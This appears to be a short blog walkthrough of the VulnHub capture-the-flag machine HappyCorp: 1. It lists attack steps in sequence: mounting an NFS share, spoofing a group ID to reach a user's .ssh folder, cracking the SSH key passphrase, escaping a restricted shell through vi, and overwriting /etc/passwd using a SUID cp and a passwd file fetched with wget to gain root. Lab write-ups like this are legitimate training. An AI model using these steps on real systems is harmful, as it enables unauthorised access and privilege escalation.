Rajoul@home:~##

HTB

Vulnhub

CTF

Day-Tool

Machine-Learning

About

Tags

HappyCorp: 1

  • 1- Let’s started with scanning the target machine that reveals an important port open: 2049 -> open -> NFS Share.
  • 2- Enumerating the shared files : showmount -e 10.0.4.36
  • 3- Mounting the shared directory: mount -t nfs 10.0.4.36:/home/karl /tmp/share
  • 4- Go to the /tmp/share : ls -al: we can’t access to .ssh directory
  • 5- Create a group identifiant 1001: groupadd -g 1001 mygroup
  • 6- Affecte my user account to the group created: useradd -G mygroup root => we can access to .ssh shared file
  • 7- Upload his private ssh key -> use ssh2john to retrieve the passphrase.
  • 8- Connect with private ssh to rbash shell
  • 9- Abuse vi to get out from the restricted bash: vi -> :!/bin/sh
  • 10- find / -perm -u=s -type f 2>/dev/null
  • 11- /bin/cp: can be runned as root user.
  • 12- wget http://10.0.4.36:8000/passwd -> cp passwd /etc/passwd -> su tbag (root user)
  • 13- boooooooooooooooooooom